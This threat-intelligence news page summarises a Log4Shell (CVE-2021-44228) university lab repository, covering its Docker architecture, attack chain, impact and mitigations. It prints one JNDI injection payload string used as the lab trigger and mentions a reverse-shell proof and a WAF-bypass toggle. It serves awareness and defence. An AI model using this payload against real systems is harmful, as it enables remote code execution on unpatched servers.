OFFSITE.DARK
← Signals

Jun 29, 2026

2 min

Sploitus

  • log4j
  • log4shell
  • cve-2021-44228
  • java
  • sploitus

news

Log4J-PoC — TPAS Log4Shell Lab Stack

TPAS coursework repo: React storefront + vulnerable Log4j 2.14 Spring API + JNDI exploit script with WAF-bypass toggle.

Summary

CVE-2021-44228 (Log4Shell) remains a critical (CVSS 10.0) JNDI injection flaw in Apache Log4j 2.0-beta9 – 2.14.1 — not a 2026 zero-day, but still widely scanned.

DarianRa/Log4J-PoC is a Docker-compose Spring Boot shopping-list lab on Log4j 2.14.1 with LDAP/HTTP marshalsec chain and reverse-shell proof demonstrating the classic exploit chain.

Key Findings

FindingDetail
CVECVE-2021-44228 (Log4Shell) + related 2021 chain CVEs
ComponentApache Log4j 2.0-beta9 – 2.14.1
Lab trigger${jndi:ldap://ldap-server:1389/EvilMalware} in shopping-list item field
ArchitectureDocker bridge: vulnerable-app :8080, ldap-server :1389, http-server :8000, attacker-listener :4444
Secondary cardTPAS React + Spring Log4j 2.14 stack (610F8853) with WAF-bypass toggle
IntentHochschule Bonn-Rhein-Sieg Secure Software Testing lab / authorized use

Attack Chain

Attacker LDAP/RMI server (init.sh) ← JNDI lookup from logged user input
        ↓
Log4j loads remote Java class
        ↓
RCE on Spring Boot host running vulnerable log4j-core

Impact

Legacy Log4j remains a high-value scanner target. Sploitus surfacing Log4J-PoC repos accelerates mass JNDI injection attempts against lagging Java estates — impact is full server compromise where patches were never applied.

Mitigation

  1. Upgrade Log4j to 2.17.1+ (or supported vendor-patched line).
  2. Remove JndiLookup class only as emergency triage, not sole long-term control.
  3. Block outbound LDAP/RMI from app subnets; monitor for ${jndi: patterns.

Related Signals

Sources

→ Source